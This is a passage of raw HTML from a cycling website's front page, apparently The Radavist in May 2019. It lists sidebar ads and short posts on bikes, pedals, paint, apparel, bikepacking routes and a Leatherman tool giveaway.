alt="Voile"> </a> </div> <div class="sidebarad"> <a href="https://allcitycycles.com/bikes/space_horse?utm_campaign=SpaceHorse&utm_source=Radavist&utm_medium=banner&utm_term=Stardust" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/03/ALLCITY_APR_Radavist_Ads_SH_600x500.jpg" alt="All City"> </a> </div> <div class="sidebarad"> <a href="https://www.instagram.com/fairdalebikes/?hl=en?utm_medium=banner&utm_source=radavist" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/radavist.may_.2019.jpg" alt="Fairdale"> </a> </div> <div class="sidebarad"> <a href="http://bit.ly/2V8MGOi" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/GB_Renew_Radavist_ad_600x500_2.png" alt="Giro"> </a> </div> <div class="sidebarad"> <a href="https://www.bigagnes.com/Gear/Tents/Bikepacking" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/03/BIGAGNES_APRIL_Web.jpg" alt="Big Agnes"> </a> </div> <div class="sidebarad"> <a href="https://moots.com/bike/routt-ybb/" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/Moots_RADAVIST_2.jpg" alt="Moots"> </a> </div> <div class="sidebarad"> <a href="https://www.cafeducycliste.com/la-gazette/toile-de-jouy-men/?utm_source=theradavist.com&utm_medium=cpc&utm_campaign=toile_de_jouy" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/radavist.jpg" alt="Cafe Du Cycliste"> </a> </div> <div class="sidebarad"> <a href="https://builtbyswift.com/" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/02/RadavistF20copy.png" alt="Swift"> </a> </div> <div class="sidebarad"> <a href="https://www.rapha.cc/us/en_US/?utm_source=dbm&utm_medium=display&utm_campaign=NAC-PRP-DIS%2020181213%20Radavist" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/04/Rad2.png" alt="Rapha"> </a> </div> <div id="sidebar-sticky"> <a href="https://industrynine.com/wheels/mountain/pillarcarbon-ul-24/?utm_source=radavist&utm_medium=banner&utm_campaign=radavist_may19" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/Industry-Nine_Cliffhanger_600x1000_May2019_V3.jpg" alt="Industry Nine"> </a> </div> <div class="sidebar-bottom"></div> </section> <div class="maincontent cf"> <div id="top-banner"> <a href="https://salsacycles.com/bikes/warroad/2019_warroad_carbon_ultegra_700?utm_campaign=Ad&utm_source=Radavist&utm_medium=social" target="_blank"> <img src="https://media.theradavist.com/uploads/2019/05/image001.jpg" alt="Salsa"> </a> </div> <!-- end #top-banner --> <!--<div id="messager" class="clear"> <div class="message">forecast</div> <div class="message">forecast</div> <div class="message">forecast</div> </div> --> <!--filter the_content for this page only, remove_filter called bottom of page @ --> <section id="articles-radar"> <!--<div class="radar-mast" >On The Radar</div>--> <!-- style="background: url(https://theradavist.com/app/themes/radavist/inc/img/radar.mast.jpg) no-repeat left center #D83729" --> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/contest-where-would-you-take-your-leatherman-free-tool/">STICKY! Contest: Where Would You Take Your Leatherman FREE Tool?</a> </header> <a href="https://theradavist.com/2019/05/contest-where-would-you-take-your-leatherman-free-tool/"><img src="https://media.theradavist.com/uploads/2019/05/P2_P4_Jaws.png?fit=700,515&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/P2_P4_Jaws.png?w=1024&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/P2_P4_Jaws.png?resize=768,566&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/P2_P4_Jaws.png?resize=700,515&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>“Where would you take your Leatherman FREE?”</p> <p>Leatherman&#8217;s tools &#8211; particularly the Wave &#8211; have been staples for us on our travels. From bikepacking or touring, camping, fishing or 4&#215;4 expeditions, we won&#8217;t go anywhere without our Leatherman. So when Leatherman added a new product to their lineup, <a href="https://www.leatherman.com/multi-tools?gclid=Cj0KCQjwtr_mBRDeARIsALfBZA7fNEZCOeQMg-E-zDypP-ShCRkvdG4rYygPCzavqtQI4l6dTekat_EaAq9qEALw_wcB" target="_blank" rel="noopener noreferrer">the FREE</a>, we had to try it out. Guess what? We liked it so much that we want to give a few away to the readers of this website. Check out the details below. <a href="https://theradavist.com/2019/05/contest-where-would-you-take-your-leatherman-free-tool/#more-166546" class="more-link"><span aria-label="Continue reading STICKY! Contest: Where Would You Take Your Leatherman FREE Tool?">(more&hellip;)</span></a></p> <div class="radar-meta-front"> <span>May 6, 2019</span> <a href="https://theradavist.com/2019/05/contest-where-would-you-take-your-leatherman-free-tool/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166546 https://theradavist.com/?p=166546">29 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/velo-orange-nuetrino-minivelo-presale-is-live/">Velo Orange Nuetrino Minivelo Presale is Live</a> </header> <a href="https://theradavist.com/2019/05/velo-orange-nuetrino-minivelo-presale-is-live/"><img src="https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?fit=700,464&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?w=4403&amp;quality=75 4403w, https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?resize=1024,678&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?resize=768,509&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?resize=1335,884&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/IMGP9701.jpg?resize=700,464&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>Minivelos gained popularity in cities where space is limited. The <a href="https://velo-orange.com/collections/neutrino-mini-velo/products/neutrino-complete-bike" rel="noopener noreferrer" target="_blank">Neutrino Mini-Velo</a> is a full sized bike with BMX tires, so high-quality rims and tires are cheap, plentiful, and strong. The small diameter wheels keep acceleration quick for cruising around town. Thick 2.4&#8243; tires eliminate the harshness of typical small wheeled bikes. The short wheelbase makes it easy to store inside so you don&#8217;t have to worry about it getting ripped off overnight. <a href="https://theradavist.com/2019/05/velo-orange-nuetrino-minivelo-presale-is-live/#more-167139" class="more-link"><span aria-label="Continue reading Velo Orange Nuetrino Minivelo Presale is Live">(more&hellip;)</span></a></p> <div class="radar-meta-front"> <span>May 16, 2019</span> <a href="https://theradavist.com/2019/05/velo-orange-nuetrino-minivelo-presale-is-live/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="167139 https://theradavist.com/?p=167139">3 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/spray-bikes-new-frame-builders-metal-plating-colors/">Spray.Bike&#8217;s New Frame Builder&#8217;s Metal Plating Colors!</a> </header> <a href="https://theradavist.com/2019/05/spray-bikes-new-frame-builders-metal-plating-colors/"><img src="https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?fit=700,467&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?w=1918&amp;quality=75 1918w, https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?resize=1024,683&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?resize=768,513&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?resize=1335,891&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/spraybikenew.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p></p> <p>Spray.Bike is the one-shot spraypaint perfect for painting a bicycle frame. It&#8217;s grown in popularity over the years and now, they&#8217;ve expanded their color and finish options to include a Frame Builder&#8217;s Metal Plating line. Included in the lineup is gold, copper, silver and bronze. These 400ml spray bottles make painting a bike frame easy and are in stock now at <a href="https://spraybike.us/" rel="noopener noreferrer" target="_blank">Spray.Bike</a>.</p> <div class="radar-meta-front"> <span>May 15, 2019</span> <a href="https://theradavist.com/2019/05/spray-bikes-new-frame-builders-metal-plating-colors/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="167069 https://theradavist.com/?p=167069">3 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/could-you-sell-everything-and-live-off-a-bike/">Could You SELL EVERYTHING and Live Off a Bike?</a> </header> <div class="videoWrapper"><iframe width="560" height="315" src="https://www.youtube.com/embed/opRd339ZFF4" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div> <p><a href="https://www.instagram.com/northsouth/" rel="noopener noreferrer" target="_blank">NorthSouth</a> takes us on a ride with <a href="https://www.instagram.com/flexgoogly/" rel="noopener noreferrer" target="_blank">Sarah</a> and <a href="https://www.instagram.com/jessecarlsson/" rel="noopener noreferrer" target="_blank">Jesse</a>, who sold everything they owned. Instead of making room for more ‘stuff’, they decided to collect experiences instead. Their whole lives are now strapped onto 2 bikes. They feel free, and on a ride that could quite literally take them anywhere.</p> <div class="radar-meta-front"> <span>May 15, 2019</span> <a href="https://theradavist.com/2019/05/could-you-sell-everything-and-live-off-a-bike/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="167064 https://theradavist.com/?p=167064">2 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/the-legend-of-rafael/">The Legend of Rafael</a> </header> <div class="videoWrapper"><iframe src="https://player.vimeo.com/video/333580941?title=0&byline=0&portrait=0" width="500" height="281" frameborder="0" allow="autoplay; fullscreen" allowfullscreen></iframe></div> <p>After a devastating breakup, Rafael finds solitude and restoration on the open road, pedaling his way to emotional health from Mexico City to northern Colorado. With just $500 to his name, he spearheads a revolution to help the underprivileged members of his new neighborhood the best way he knows how: repairing their bicycles.</p> <div class="radar-meta-front"> <span>May 15, 2019</span> <a href="https://theradavist.com/2019/05/the-legend-of-rafael/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="167062 https://theradavist.com/?p=167062">1 comment</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/enve-at-the-belgian-waffle-ride/">ENVE at the Belgian Waffle Ride</a> </header> <div class="videoWrapper"><iframe src="https://player.vimeo.com/video/334973972?color=d63b2f&title=0&byline=0&portrait=0" width="500" height="281" frameborder="0" allow="autoplay; fullscreen" allowfullscreen></iframe></div> <p>ENVE went to the Belgian Waffle Ride and survived all 134 miles of rough and rugged SoCal terrain. </p> <div class="radar-meta-front"> <span>May 15, 2019</span> <a href="https://theradavist.com/2019/05/enve-at-the-belgian-waffle-ride/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="167057 https://theradavist.com/?p=167057">No comments yet</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/in-defense/">In Defense</a> </header> <div class="videoWrapper"><iframe width="560" height="315" src="https://www.youtube.com/embed/twuCYclqzIw" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div> <p>Green River, Utah has some amazing trails, surrounded by some of the most epic scenery.</p> <div class="radar-meta-front"> <span>May 15, 2019</span> <a href="https://theradavist.com/2019/05/in-defense/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="167060 https://theradavist.com/?p=167060">No comments yet</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/why-are-paul-klampers-disc-brakes-single-sided/">Why Are Paul Klampers Disc Brakes Single Sided?</a> </header> <div class="videoWrapper"><iframe src="https://player.vimeo.com/video/329834562?color=d63b2f&title=0&byline=0&portrait=0" width="640" height="360" frameborder="0" allow="autoplay; fullscreen" allowfullscreen></iframe></div> <p>Watch this video to find out!</p> <div class="radar-meta-front"> <span>May 14, 2019</span> <a href="https://theradavist.com/2019/05/why-are-paul-klampers-disc-brakes-single-sided/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166971 https://theradavist.com/?p=166971">3 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/a-throwback-look-for-danny-macaskill/">A Throwback Look for Danny MacAskill</a> </header> <div class="videoWrapper"><iframe width="560" height="315" src="https://www.youtube.com/embed/avPHyG_tW4k" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div> <p>Fisheyes, deep cuts, and 90&#8217;s era hip-hop give the latest Danny MacAskill video a bit of a throwback feel. Watch as Danny reps his new <a href="https://www.endurasport.com/" rel="noopener noreferrer" target="_blank">Endura</a> pads.</p> <div class="radar-meta-front"> <span>May 14, 2019</span> <a href="https://theradavist.com/2019/05/a-throwback-look-for-danny-macaskill/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166968 https://theradavist.com/?p=166968">No comments yet</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/cascada-all-road-venture-jersey/">Cascada All Road: Venture Jersey</a> </header> <a href="https://theradavist.com/2019/05/cascada-all-road-venture-jersey/"><img src="https://media.theradavist.com/uploads/2019/05/venture-jersey-cycling.jpg?fit=700,700&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/venture-jersey-cycling.jpg?w=1000&amp;quality=75 1000w, https://media.theradavist.com/uploads/2019/05/venture-jersey-cycling.jpg?resize=150,150&amp;quality=75 150w, https://media.theradavist.com/uploads/2019/05/venture-jersey-cycling.jpg?resize=768,768&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/venture-jersey-cycling.jpg?resize=700,700&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>Just because warmer months are coming, doesn&#8217;t mean you can&#8217;t use merino jerseys. The Cascada <a href="https://cascada.cc/en/apparel-base-layers/20-31-venture-jersey-cycling.html" rel="noopener noreferrer" target="_blank">Venture Jersey</a> utilizes a blend to keep you cool on warmer rides, while still benefiting from the comfort, fit, feel, and versatility of merino wool. Merino reacts to body temperature changes, absorbs and transfers excess moisture away, protects against UV radiation, is naturally antibacterial and odor resistant, is soft, hypoallergenic and does not cause itching. Available in Olive, Mustard, and Clay and in stock now at <a href="https://cascada.cc/en/apparel-base-layers/20-31-venture-jersey-cycling.html" rel="noopener noreferrer" target="_blank">Cascada</a>.</p> <div class="radar-meta-front"> <span>May 14, 2019</span> <a href="https://theradavist.com/2019/05/cascada-all-road-venture-jersey/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166965 https://theradavist.com/?p=166965">No comments yet</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/standerts-kreissage-2nd-cut-disc-road-bike-is-made-in-italy/">Standert&#8217;s Kreissäge 2nd Cut DISC Road Bike is Made in Italy</a> </header> <a href="https://theradavist.com/2019/05/standerts-kreissage-2nd-cut-disc-road-bike-is-made-in-italy/"><img src="https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?fit=700,467&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?w=2048&amp;quality=75 2048w, https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?resize=1024,683&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/Profileshot_website_895fd4bf-d5d8-4331-917e-67b0a172be3c_2048x.png?resize=700,467&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>Stander&#8217;s new Kreissäge comes in a rim or disc brake version and is made from high-end Scandium tubing in Italy. With a race-proven geometry, Di2, AXS or 2x compatible, flat mounts, and a no-nonsense kit, it checks a lot of boxes for those looking for a zippy and capable road bike, that&#8217;s a little different from the rest of the options out there. Head to <a href="https://standert.de/collections/road/products/kreissaege-2nd-cut-disc-charcoal-sram-force-etap-axs" rel="noopener noreferrer" target="_blank">Standert</a> to read more.</p> <div class="radar-meta-front"> <span>May 14, 2019</span> <a href="https://theradavist.com/2019/05/standerts-kreissage-2nd-cut-disc-road-bike-is-made-in-italy/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166960 https://theradavist.com/?p=166960">No comments yet</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/it-was-time-for-a-switch-to-shimano-pedals/">It Was Time for a Switch to Shimano Pedals</a> </header> <a href="https://theradavist.com/2019/05/it-was-time-for-a-switch-to-shimano-pedals/"><img src="https://media.theradavist.com/uploads/2019/01/Santa-Cruz-5010-37-1.jpg?fit=700,467&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/01/Santa-Cruz-5010-37-1.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/01/Santa-Cruz-5010-37-1.jpg?resize=1200,800&amp;quality=75 1200w, https://media.theradavist.com/uploads/2019/01/Santa-Cruz-5010-37-1.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/01/Santa-Cruz-5010-37-1.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/01/Santa-Cruz-5010-37-1.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>Throughout the course of my fascination with cycling, I have used Time Atac pedals. My first clipless experience was riding mountain bikes in central and western North Carolina, from the Piedmont to the Pisgah, I learned to navigate an early 2000&#8217;s hardtail over the slick rocks and roots of those wooded trails. As a cyclist, I&#8217;ve come a long way since those early days of riding Time pedals, my body has changed, and I&#8217;m getting older. </p> <p></p> <p>Like worn out bearings in a full suspension bike, having worn out knees and other joints can really ruin a ride. I was diagnosed with Osgood-Schlatter when I was 15 after an abrupt growth spurt. The resulting scarred tissue and calcification rendered large bumps right below my knee caps. Throughout my 20&#8217;s and into my early 30&#8217;s, I had very few cases of inflammation, yet into my late 30&#8217;s, it doesn&#8217;t take much to cause swelling and pain in my knee from riding. This inflammation is caused by everything from overexertion on road rides, to pushing through washboarded or sandy roads on bike tours, or even just going too hard on one of my everyday routes here in Los Angeles. </p> <p>It took this last incident to really re-think my riding experience and evaluate what small changes I could make to my pedal stroke, foot placement, and even mental state, yet the biggest change is the one I wasn&#8217;t expecting; a shift from my favorite Time pedals to Shimano. <a href="https://theradavist.com/2019/05/it-was-time-for-a-switch-to-shimano-pedals/#more-166856" class="more-link"><span aria-label="Continue reading It Was Time for a Switch to Shimano Pedals">(more&hellip;)</span></a></p> <div class="radar-meta-front"> <span>May 13, 2019</span> <a href="https://theradavist.com/2019/05/it-was-time-for-a-switch-to-shimano-pedals/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166856 https://theradavist.com/?p=166856">54 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/path-less-pedaled-asks-are-custom-bikes-worth-it/">Path Less Pedaled Asks Are Custom Bikes Worth It?</a> </header> <div class="videoWrapper"><iframe width="560" height="315" src="https://www.youtube.com/embed/oxpFIN-q1Vo" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div> <p>In their latest Vlog, Path Less Pedaled asks a question we get here at the Radavist a lot; are custom bikes worth it? After watching this video, what do you think? Feel free to ask any questions you might have in the comments and we&#8217;ll answer them the best to our abilities. </p> <div class="radar-meta-front"> <span>May 13, 2019</span> <a href="https://theradavist.com/2019/05/path-less-pedaled-asks-are-custom-bikes-worth-it/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166850 https://theradavist.com/?p=166850">4 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/chater-lea-returns-with-made-in-uk-components-and-the-grand-tour-pedal/">Chater Lea Returns with Made in UK Components and the Grand Tour Pedal</a> </header> <a href="https://theradavist.com/2019/05/chater-lea-returns-with-made-in-uk-components-and-the-grand-tour-pedal/"><img src="https://media.theradavist.com/uploads/2019/05/Shot-4.jpg?fit=700,560&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Shot-4.jpg?w=1964&amp;quality=75 1964w, https://media.theradavist.com/uploads/2019/05/Shot-4.jpg?resize=1024,819&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/Shot-4.jpg?resize=768,614&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/Shot-4.jpg?resize=1335,1068&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/Shot-4.jpg?resize=700,560&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>Those who dabbled in vintage bikes and components, the name <a href="https://www.chaterlea.com/" rel="noopener noreferrer" target="_blank">Chater Lea</a> will ring a bell. Their cottered cranks and other components were always in demand, including their &#8220;Sprint&#8221; pedals. At Bespoked UK earlier this month, Chater Lea revealed its first new product from the recently relaunched brand, the Grand Tour Pedal. These are made from high corrosion-resistant, marine-grade 316 and hardened 17-4PH stainless steel, giving the pedals an aesthetic more akin to a high-end watch, rather than a bicycle pedal. They will be available for purchase via Chater Lea&#8217;s website in the next five to six weeks at a price of £250. These pedals come with a lifetime original owner warranty. Check out more at <a href="https://www.chaterlea.com/" rel="noopener noreferrer" target="_blank">Chater Lea</a> and see more photos below. <a href="https://theradavist.com/2019/05/chater-lea-returns-with-made-in-uk-components-and-the-grand-tour-pedal/#more-166843" class="more-link"><span aria-label="Continue reading Chater Lea Returns with Made in UK Components and the Grand Tour Pedal">(more&hellip;)</span></a></p> <div class="radar-meta-front"> <span>May 13, 2019</span> <a href="https://theradavist.com/2019/05/chater-lea-returns-with-made-in-uk-components-and-the-grand-tour-pedal/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166843 https://theradavist.com/?p=166843">11 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/bikepacking-roots-announces-the-wild-west-route/">Bikepacking Roots Announces the Wild West Route</a> </header> <a href="https://theradavist.com/2019/05/bikepacking-roots-announces-the-wild-west-route/"><img src="https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?fit=700,541&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?resize=1024,791&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?resize=768,593&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?resize=1335,1031&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/wild-west-route-6.jpg?resize=700,541&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>To help satiate the rapidly-growing bikepacking community’s desire for new long-distance routes, Bikepacking Roots recently released the 2,700-mile-long <a href="https://www.bikepackingroots.org/wild-west-route.html" rel="noopener noreferrer" target="_blank">Wild West Route</a>. This Canada- to-Mexico epic links together dirt roads and rough 4&#215;4 tracks through Montana, Idaho, Utah, and Arizona, showcasing the vast expanses of wild and public lands in the Intermountain West. <a href="https://theradavist.com/2019/05/bikepacking-roots-announces-the-wild-west-route/#more-166824" class="more-link"><span aria-label="Continue reading Bikepacking Roots Announces the Wild West Route">(more&hellip;)</span></a></p> <div class="radar-meta-front"> <span>May 13, 2019</span> <a href="https://theradavist.com/2019/05/bikepacking-roots-announces-the-wild-west-route/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166824 https://theradavist.com/?p=166824">6 comments</span></a> </div> </article> <article> <header class="radar-header"> <a href="https://theradavist.com/2019/05/chumba-launches-their-made-in-texas-del-amo-steel-road-bike/">Chumba Launches Their Made in Texas Del Amo Steel Road Bike</a> </header> <a href="https://theradavist.com/2019/05/chumba-launches-their-made-in-texas-del-amo-steel-road-bike/"><img src="https://media.theradavist.com/uploads/2019/05/IMGA0728.jpg?fit=700,467&amp;quality=75" class="attachment-reportage-lead size-reportage-lead wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/IMGA0728.jpg?w=1500&amp;quality=75 1500w, https://media.theradavist.com/uploads/2019/05/IMGA0728.jpg?resize=1024,683&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/IMGA0728.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/IMGA0728.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/IMGA0728.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 700px) 100vw, 700px" /></a> <p></p> <p>Chumba, makers of true to form steel bikes in Texas, just announced their Del Amo steel road bike. The Del Amo comes in 6 sizes, a compact geometry, made from OS Columbus Spirit tubing with Paragon bits. The tubing spec allows for compliance in the seat stays and top tube, making the bike ride smoothly, while offering fast acceleration that Spirit is known for. These bikes are offered with a plethora of options and start at $1,625.00. Head to <a href="https://www.chumbausa.com/del-amo-road" rel="noopener noreferrer" target="_blank">Chumba</a> for more information and see more photos below. <a href="https://theradavist.com/2019/05/chumba-launches-their-made-in-texas-del-amo-steel-road-bike/#more-166801" class="more-link"><span aria-label="Continue reading Chumba Launches Their Made in Texas Del Amo Steel Road Bike">(more&hellip;)</span></a></p> <div class="radar-meta-front"> <span>May 10, 2019</span> <a href="https://theradavist.com/2019/05/chumba-launches-their-made-in-texas-del-amo-steel-road-bike/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166801 https://theradavist.com/?p=166801">2 comments</span></a> </div> </article> <div class="radar-navigation"> <a href="https://theradavist.com/page/2/" >Older Entries</a> </div> </section> <!-- articles-radar --> <section id="articles-reportage"> <div class="reportage-mast-wrap"> <div class="reportage-mast-title">REPORTAGE</div> <div class="reportage-mast-left"></div> <div class="reportage-mast-center"></div> <div class="reportage-mast-right"></div> </div> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/christopher-russells-art-rambler-is-a-mobile-paint-studio/">Christopher Russell&#8217;s Art Rambler is a Mobile Paint Studio</a> <a href="https://theradavist.com/2019/05/christopher-russells-art-rambler-is-a-mobile-paint-studio/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="167078 https://theradavist.com/?p=167078">3 comments</span></a> </header> <a href="https://theradavist.com/2019/05/christopher-russells-art-rambler-is-a-mobile-paint-studio/"> <img src="https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?fit=1024,683&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?w=1800&amp;quality=75 1800w, https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?resize=1024,683&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/DSF2997.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/jarrods-northern-frameworks-copper-hardtail-in-the-mountains-of-la/">Jarrod&#8217;s Northern Frameworks Copper Hardtail in the Mountains of LA</a> <a href="https://theradavist.com/2019/05/jarrods-northern-frameworks-copper-hardtail-in-the-mountains-of-la/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166974 https://theradavist.com/?p=166974">13 comments</span></a> </header> <a href="https://theradavist.com/2019/05/jarrods-northern-frameworks-copper-hardtail-in-the-mountains-of-la/"> <img src="https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?fit=1024,682&amp;quality=75" class="attachment-medium size-medium wp-post-image" alt="" srcset="https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?w=2000&amp;quality=75 2000w, https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?resize=1024,682&amp;quality=75 1024w, https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?resize=768,512&amp;quality=75 768w, https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?resize=1335,890&amp;quality=75 1335w, https://media.theradavist.com/uploads/2019/05/Jarrods-Northern-Frameworks-Hardtail-61.jpg?resize=700,467&amp;quality=75 700w" sizes="(max-width: 1024px) 100vw, 1024px" /> </a> </article> <article> <header class="reportage-header cf"> <a href="https://theradavist.com/2019/05/meet-the-new-quincy-julianas-answer-to-the-popular-santa-cruz-stigmata-amy-jurries/">Meet the New Quincy: Juliana’s Answer to the Popular Santa Cruz Stigmata &#8211; Amy Jurries</a> <a href="https://theradavist.com/2019/05/meet-the-new-quincy-julianas-answer-to-the-popular-santa-cruz-stigmata-amy-jurries/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="166871 